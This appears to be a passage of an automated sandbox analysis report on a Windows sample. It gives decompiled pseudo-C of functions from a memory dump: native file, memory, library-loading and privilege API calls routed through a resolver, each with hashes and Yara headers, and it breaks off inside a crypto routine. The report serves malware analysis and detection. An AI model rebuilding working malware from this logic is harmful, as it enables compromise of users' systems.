NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D5B, Relevance: 1.5, APIs: 1, Instructions: 42
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D5B(HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t24;
				void* _t34;

				_t18 = _v0;
				_t3 = _t18 + 0xc40; // 0xc40
				E0041A960(_t34, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t24;
			}

0x00419d63
0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 93cd64af0f8cc836e555e93aa38f4e7d6c10a3f620d67f6b3a16e333d04fa8f3
Instruction ID: 1462a3fa4d5105cc6376105754814bb71aacaf4c91e9c01b1222208690de2737
Opcode Fuzzy Hash: 93cd64af0f8cc836e555e93aa38f4e7d6c10a3f620d67f6b3a16e333d04fa8f3
Instruction Fuzzy Hash: 9901B6B2215108AFCB48CF99DC85DEB37EEEF8C754F158648BA1DD7250D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00419F3A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("adc al, [edi-0x74aa32f6]");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E0041A960(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x00419f3c
0x00419f43
0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 30c8d7ea11b91610dac68db6023bac78b959d4682a2b088f37e405cec785fec9
Instruction ID: e013adae95b428548c5beb4d8c0b1c9d1183e77c60d8c8506a2ec7167cee9d5d
Opcode Fuzzy Hash: 30c8d7ea11b91610dac68db6023bac78b959d4682a2b088f37e405cec785fec9
Instruction Fuzzy Hash: 61F01CB2200209BFCB14DF99CC81EEB7BA9EF9C354F158559FA4C97241C630E961CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E8B, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 80637edd3ad4a7491ba6cd9be2bea8f4c21db013a3e6ac0d1ae3306a6caa4377
Instruction ID: d694abb2169e919811e7cd99883a1d9a1187d246e8d83267771881e05004ab97
Opcode Fuzzy Hash: 80637edd3ad4a7491ba6cd9be2bea8f4c21db013a3e6ac0d1ae3306a6caa4377
Instruction Fuzzy Hash: B9E08C712003047BD710EBA8CC85EE77B68EF44760F09449ABA4C6B242C530FA4087E0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00409A90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* __ebp;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B810( &_v284, 0x104);
						E0041BE80( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t39, _t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_push( &_v24);
					_push(_t52); // executed
					_t34 = E00408140(_t39); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a9b
0x00409aa3
0x00409aa5
0x00409aaa
0x00409aaf
0x00409ac2
0x00409ac7
0x00409ad0
0x00409adc
0x00409aef
0x00409af4
0x00409af7
0x00409b00
0x00409b12
0x00409b17
0x00409b1c
0x00000000
0x00000000
0x00409b1e
0x00409b22
0x00000000
0x00000000
0x00409b24
0x00000000
0x00409b22
0x00409b26
0x00409b29
0x00409b2f
0x00409b31
0x00409b3c
0x00409b41
0x00409b44
0x00409b4f
0x00409b50
0x00409b51
0x00409b5c
0x00409b5e
0x00409b64
0x00409b68
0x00409b6b
0x00409b6b
0x00409b72
0x00409b75
0x00409b7a
0x00409b87
0x00409ab6
0x00409ab6
0x00409ab6

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E004082F0(void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				intOrPtr* _t15;
				int _t16;
				void* _t21;
				long _t24;
				intOrPtr* _t28;
				void* _t29;
				void* _t33;

				_t33 = __eflags;
				_t21 = __edx;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				 *(_t21 + 3) =  *(_t21 + 3) >> 0x51;
				E0041C400();
				_t14 = E0040ACD0(_t33, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t28 = _t15;
				if(_t28 != 0) {
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t35 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t28(_t24, 0x8003, _t29 + (E0040A460(_t35, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
					return _t16;
				}
				return _t15;
			}

0x004082f0
0x004082f0
0x004082ff
0x00408303
0x0040830a
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082B6, Relevance: 1.6, APIs: 1, Instructions: 54
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E004082B6(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr* _t11;
				intOrPtr* _t12;
				void* _t14;
				int _t15;
				void* _t22;
				long _t28;
				int _t33;
				void* _t37;
				void* _t40;

				_t12 = _t11;
				if(__eflags < 0) {
					 *(__edx + 3) =  *(__edx + 3) >> 0x51;
					E0041C400();
					_t14 = E0040ACD0(__eflags,  *((intOrPtr*)(_t37 + 8)) + 0x1c, _t37 - 0x40); // executed
					_t15 = E00414E20( *((intOrPtr*)(_t37 + 8)) + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
					_t33 = _t15;
					__eflags = _t33;
					if(_t33 != 0) {
						_t28 =  *(_t37 + 0xc);
						_t15 = PostThreadMessageW(_t28, 0x111, 0, 0); // executed
						__eflags = _t15;
						if(__eflags == 0) {
							_t15 =  *_t33(_t28, 0x8003, _t37 + (E0040A460(__eflags, 1, 8) & 0x000000ff) - 0x40, _t15);
						}
					}
					return _t15;
				} else {
					asm("sti");
					asm("popad");
					_push(_t40 + 1);
					_push(0x11c6f95e);
					asm("adc eax, ebp");
					asm("aad 0x2f");
					 *_t12 =  *_t12 + _t12;
					return E0041B150(_t22) + _t12 + 0x1000;
				}
			}

0x004082b6
0x004082b7
0x0040830a
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x00408338
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372
0x004082b9
0x004082bb
0x004082bd
0x004082be
0x004082c1
0x004082c5
0x004082c7
0x004082c9
0x004082dd
0x004082dd

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0c289ac1efd41ff397826466d6e217cae200cf09f9022ae675153661181bcfb9
Instruction ID: 5a30a9785efae46b87832583637de71dabcf6fe8cd4be8f1309a9b9d5b9787d1
Opcode Fuzzy Hash: 0c289ac1efd41ff397826466d6e217cae200cf09f9022ae675153661181bcfb9
Instruction Fuzzy Hash: 9B017D3168022836E72026545D03FFF7718AF81F29F15425EFE44B91C2DAFD680646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C1, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041A1C1(void* __eax, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, struct _LUID* _a28) {
				int _t14;
				void* _t20;

				_pop(ss);
				asm("a16 outsd");
				_pop(ds);
				asm("sbb dword [edi-0xc], 0x5579c215");
				_t11 = _a16;
				E0041A960(_t20, _a16, _a16 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a1c3
0x0041a1c4
0x0041a1c6
0x0041a1ca
0x0041a1d3
0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: e0597f77ed8500704a64f307e558accc8d687e7de7523db9f2fc234aed8debb8
Instruction ID: 9c8c25ba341e71b75f0b78c8e7d55dd7c00a168ffaa631c088396efc0196e038
Opcode Fuzzy Hash: e0597f77ed8500704a64f307e558accc8d687e7de7523db9f2fc234aed8debb8
Instruction Fuzzy Hash: 36E06DB66102046BCB24DF99EC80ED7B768EF45B60F118159FD0C6B241CA35A956CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A062, Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A062(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t14;
				void* _t19;

				asm("repne sub eax, 0x55e5f672");
				_t11 = _a4;
				_t5 = _t11 + 0xc74; // 0xc74
				E0041A960(_t19, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t14;
			}

0x0041a063
0x0041a073
0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: fbb7c8d68295ea8239bce943f6e1290c3342412f533dedfa1f2e41b5366881ee
Instruction ID: 3f40c745a364dc1f8357f8d2923015dff7255f908326c8a2410d5bab0ff71eba
Opcode Fuzzy Hash: fbb7c8d68295ea8239bce943f6e1290c3342412f533dedfa1f2e41b5366881ee
Instruction Fuzzy Hash: 55E0EDB1200204AFCB18DF94CC49EEB3368EF48310F054158FD489B252D630E954CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a047
0x0041a05d
0x0041a061

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0b3
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409E40, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00409E40(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
